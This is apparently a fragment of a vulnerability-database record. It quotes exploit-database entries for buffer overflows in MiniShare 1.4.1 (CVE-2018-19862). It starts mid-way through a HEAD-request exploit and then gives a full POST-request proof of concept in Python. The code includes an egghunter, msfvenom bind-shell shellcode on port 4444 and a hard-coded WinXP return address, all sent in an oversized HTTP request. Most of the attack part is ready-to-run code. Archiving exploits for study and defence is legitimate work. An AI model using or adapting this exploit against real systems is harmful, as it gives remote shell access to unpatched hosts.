\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\"\n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\"\n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\")\n\n# findjmp kernel32.dll esp - WinXP SP3 English\n#0x7C809F83 call esp\n\nnops = \"\\x90\" * 16\n\njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 -\n1786 - 4 - 16 - len(egghunter))\n\ntry:\nprint \"Sending exploit...\"\nconnection.connect((host,port))\nbuffer = (\n\"HEAD \" + junk + \" HTTP/1.1\\r\\n\"\n\"Host: \" + shellcode + \"\\r\\n\\r\\n\")\n\nconnection.send(buffer)\nconnection.close()\nprint \"\\nExploit Sended \", len(buffer)\nexcept:\nprint \"Connection error\"\n\n\n\n3. Solution:\n\nThis product is deprecated\n\n-->\n\n\n<!--\n# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.\n# Date: 05-12-2018\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://minishare.sourceforge.net/\n# Software Link: http://minishare.sourceforge.net/\n# Version: Minishare v1.4.1\n# Tested on: Windows\n# CVE : CVE-2018-19862\n# Category: exploit\n\n1. Description\n\nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\nexecute arbitrary code via a long HTTP POST request.\n\n\n2. Proof of Concept\n\nExploit:\n\n#!/usr/bin/env python\nimport socket\nimport struct\nimport os\n\n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\nexecute arbitrary code via a long HTTP POST request - by Rafa\n# CVE: CVE-2018-19862\n# Via Egghunter because shellcode in ESP only 210 bytes long.\n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/\nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = \"127.0.0.1\"\nport = 80\n\n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34\negghunter =\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n\n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f\npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c\n#Found 10 compatible encoders\n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai\n#x86/shikata_ga_nai succeeded with size 355 (iteration=0)\n#x86/shikata_ga_nai chosen with final size 355\n#Payload size: 355 bytes\n#Final size of c file: 1516 bytes\n#unsigned char buf[] =\nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\"\n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\"\n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\"\n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\"\n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\"\n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\"\n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\"\n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\"\n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\"\n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\"\n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\"\n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\"\n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\"\n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\"\n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\"\n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\"\n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\"\n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\"\n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\"\n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\"\n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\"\n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\"\n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\")\n\n# findjmp kernel32.dll esp - WinXP SP3 English\n#0x7C809F83 call esp\n\nnops = \"\\x90\" * 16\n\njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 -\n1786 - 4 - 16 - len(egghunter))\n\ntry:\nprint \"Sending exploit...\"\nconnection.connect((host,port))\n\nbuffer = (\n\"POST \" + junk + \" HTTP/1.1\\r\\n\"\n\"Host: \" + shellcode + \"\\r\\n\\r\\n\")\n\nconnection.send(buffer)\nconnection.close()\nprint \"\\nExploit Sended \", len(buffer)\nexcept:\nprint \"Connection error\"\n\n\n\n3. Solution:\n\nThis product is deprecated\n\n-->", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
